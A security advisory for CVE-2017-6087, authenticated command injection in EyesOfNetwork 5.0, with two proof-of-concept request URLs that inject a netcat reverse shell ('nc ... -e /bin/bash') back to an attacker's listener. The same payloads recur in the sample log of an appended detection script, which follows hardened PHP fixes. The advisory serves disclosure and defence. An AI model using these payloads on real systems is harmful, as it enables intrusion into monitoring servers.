# [CVE-2017-6087] EON 5.0 Remote Code Execution

## Description

EyesOfNetwork ("EON") is an OpenSource network monitoring solution.

## Remote Code Execution (authenticated)

The Eonweb code does not correctly filter arguments, allowing authenticated users to execute arbitrary code.

**CVE ID**: CVE-2017-6087
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-78
**CVSS Base Score**: 7.6
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

### Proof of Concept 1

On the attacker's host, we start a handler:

```
nc -lvp 1337
```

The `selected_events` parameter is not correctly filtered before it is used by the `shell_exec()` function. It is therefore possible to inject a payload such as the one in the request below, which connects back to our handler:

```
https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
```

#### Vulnerable code

The payload gets injected into the `$event[$key]` and `$ged_command` variables of the `module/monitoring_ged/ged_functions.php` file, line 373:

```php
$ged_command = "-update -type $ged_type_nbr ";
foreach ($array_ged_packets as $key => $value) {
    if ($value["type"] == true) {
        if ($key == "owner") {
            $event[$key] = $owner;
        }
        // Each value is only wrapped in double quotes; shell metacharacters
        // inside it are not escaped, so they reach the shell untouched.
        $ged_command .= "\"".$event[$key]."\" ";
    }
}
$ged_command = trim($ged_command, " ");
shell_exec($path_ged_bin." ".$ged_command);
```

Two other functions in this file are also affected by this problem:

* `delete($selected_events, $queue);`
* `ownDisown($selected_events, $queue, $global_action);`

### Proof of Concept 2

On the attacker's host, we start a handler:

```
nc -lvp 1337
```

The `module` parameter is not correctly filtered before it is used by the `shell_exec()` function. Again, we inject our connect-back payload:

```
https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
```

#### Vulnerable code

In the `module/index.php` file, line 24, we can see that our payload is injected into the `exec()` function without any sanitization:

```php
# Check optional module to load
if(isset($_GET["module"]) && isset($_GET["link"])) {
    # $_GET["module"] is concatenated straight into the command line
    $module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");
    # Redirect to module page if rpm installed
    if($module!=0) {
        header('Location: '.$_GET["link"].'');
    }
}
```

## Timeline (dd/mm/yyyy)

* 01/10/2016 : Initial discovery.
* 09/10/2016 : First contact with vendor.
* 23/10/2016 : Technical details sent to the security contact.
* 27/10/2016 : Vendor acknowledgement and first patching attempt.
* 11/10/2016 : Testing the patch revealed that it needed more work.
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our responsible disclosure agreement.
* 14/03/2017 : Public disclosure.

Thank you to EON for the fast response.

## Solution

Update to version 5.1

## Affected versions

* Version <= 5.0

## Credits

* Nicolas SERRA <n.serra@sysdream.com> -- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
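The two vulnerable excerpts above (ged_functions.php line 373 and module/index.php line 24) share one root cause: request parameters are concatenated into a command string and handed to `shell_exec()` / `exec()`. The following is an added example, not EyesOfNetwork's own code or the vendor's 5.1 fix, showing hardened replacements for both sinks. Function names (`buildGedCommand`, `runGed`, `isInstalledEonModule`, `safeRedirectTarget`) are hypothetical; `$path_ged_bin`, `$array_ged_packets`, `$event` and `$owner` follow the layout of the advisory's excerpt.

```php
<?php
// Added example, not EyesOfNetwork's own code: hardened replacements for the
// two shell-invoking sinks quoted in this advisory. Function names are
// hypothetical; $path_ged_bin and the $array_ged_packets / $event layout are
// taken from the advisory's excerpt of ged_functions.php.

// Sink 1 (ged_functions.php): every value that reaches the command line goes
// through escapeshellarg(), which single-quotes it and escapes embedded quotes,
// so ';' or '|' inside selected_events[] is passed to the GED binary as
// literal argument text instead of starting a new shell command.
function buildGedCommand($ged_type_nbr, array $array_ged_packets, array $event, $owner)
{
    $args = array('-update', '-type', escapeshellarg((string) (int) $ged_type_nbr));
    foreach ($array_ged_packets as $key => $value) {
        if ($value['type'] == true) {
            if ($key === 'owner') {
                $event[$key] = $owner;
            }
            $raw    = isset($event[$key]) ? $event[$key] : '';
            $args[] = escapeshellarg((string) $raw);
        }
    }
    return implode(' ', $args);
}

function runGed($path_ged_bin, $ged_command)
{
    // The binary path comes from configuration, but quoting it costs nothing.
    return shell_exec(escapeshellarg($path_ged_bin) . ' ' . $ged_command);
}

// Sink 2 (module/index.php): allow-list first. An RPM package name needs only
// letters, digits and a few punctuation characters, so anything else is
// rejected before any shell call; escapeshellarg() is kept as defence in depth.
function isInstalledEonModule($module)
{
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._+-]{0,63}$/', $module)) {
        return false;
    }
    $out = array();
    $rc  = 1;
    exec('rpm -q ' . escapeshellarg($module) . ' 2>/dev/null', $out, $rc);
    if ($rc !== 0) {          // rpm exits non-zero when the package is absent
        return false;
    }
    foreach ($out as $line) { // mirror the original "grep '.eon'" test in PHP
        if (strpos($line, '.eon') !== false) {
            return true;
        }
    }
    return false;
}

// The original block also redirects to whatever "link" holds; restricting it
// to an application-relative path keeps the redirect target under our control.
function safeRedirectTarget($link)
{
    if (preg_match('#^/(?!/)[A-Za-z0-9_./?=&-]*$#', $link) && strpos($link, '..') === false) {
        return $link;
    }
    return null;
}

// Drop-in replacement for the block quoted from module/index.php, line 24
if (isset($_GET['module'], $_GET['link']) && isInstalledEonModule($_GET['module'])) {
    $target = safeRedirectTarget($_GET['link']);
    if ($target !== null) {
        header('Location: ' . $target);
        exit;
    }
}
```

The allow-list check is what actually closes the hole: `escapeshellarg()` alone stops the shell from interpreting the value, but it still lets arbitrary strings reach `rpm`, so validating the shape of a package name first keeps the attack surface at the minimum the feature needs. The `delete()` and `ownDisown()` functions named in the advisory can be fed the output of `buildGedCommand()` in the same way.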
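For teams that cannot patch immediately, the two request shapes shown in the proofs of concept are easy to spot in web server logs. The following is an added example, not part of the advisory, that scans Apache-style access log lines for requests to the two vulnerable endpoints whose `selected_events[]` or `module` parameter contains shell metacharacters. The log lines are constructed for the demonstration (the first and third mirror the advisory's PoC URLs; the others are benign); the function name `findShellInjectionAttempts` is hypothetical.

```php
<?php
// Added example, not from the advisory or EyesOfNetwork: flag access-log
// requests to the two vulnerable endpoints whose injectable parameter carries
// shell metacharacters. Sample log lines below are constructed.

function vulnerableEndpoints()
{
    // path => name of the parameter that reaches exec()/shell_exec()
    return array(
        '/module/monitoring_ged/ged_actions.php' => 'selected_events',
        '/module/index.php'                      => 'module',
    );
}

function findShellInjectionAttempts(array $logLines)
{
    $endpoints = vulnerableEndpoints();
    $hits = array();
    foreach ($logLines as $line) {
        // Common Log Format request field: "METHOD /path?query HTTP/x.y"
        if (!preg_match('#"(?:GET|POST) (\S+) HTTP/#', $line, $m)) {
            continue;
        }
        $url  = parse_url($m[1]);
        $path = isset($url['path']) ? $url['path'] : '';
        if (!isset($endpoints[$path])) {
            continue;
        }
        $params = array();
        // parse_str() decodes %XX escapes and turns "name[]" into an array
        parse_str(isset($url['query']) ? $url['query'] : '', $params);
        $name   = $endpoints[$path];
        $value  = isset($params[$name]) ? $params[$name] : '';
        $values = is_array($value) ? $value : array($value);
        foreach ($values as $v) {
            // Characters that end or chain a command; a package id or event
            // number never legitimately contains them.
            if (preg_match('/[;|&`$()\n]/', (string) $v)) {
                $hits[] = array('path' => $path, 'param' => $name, 'value' => $v);
                break;
            }
        }
    }
    return $hits;
}

// Constructed sample log: lines 1 and 3 reproduce the advisory's PoC requests.
$sampleLog = array(
    '10.0.5.124 - admin [14/Mar/2017:10:00:01 +0100] "GET /module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash; HTTP/1.1" 200 512',
    '10.0.5.50 - admin [14/Mar/2017:10:00:02 +0100] "GET /module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=1234 HTTP/1.1" 200 512',
    '10.0.5.124 - admin [14/Mar/2017:10:00:03 +0100] "GET /module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding HTTP/1.1" 302 0',
    '10.0.5.50 - admin [14/Mar/2017:10:00:04 +0100] "GET /module/index.php?module=eonweb-foo&link=/foo/ HTTP/1.1" 302 0',
);

foreach (findShellInjectionAttempts($sampleLog) as $hit) {
    printf("ALERT %s param=%s value=%s\n", $hit['path'], $hit['param'], $hit['value']);
}
```

Run against the sample above, the scan reports the first and third lines and ignores the two benign ones. Because the endpoints require authentication, a hit also tells you which account issued the request, which is the first thing to check during triage.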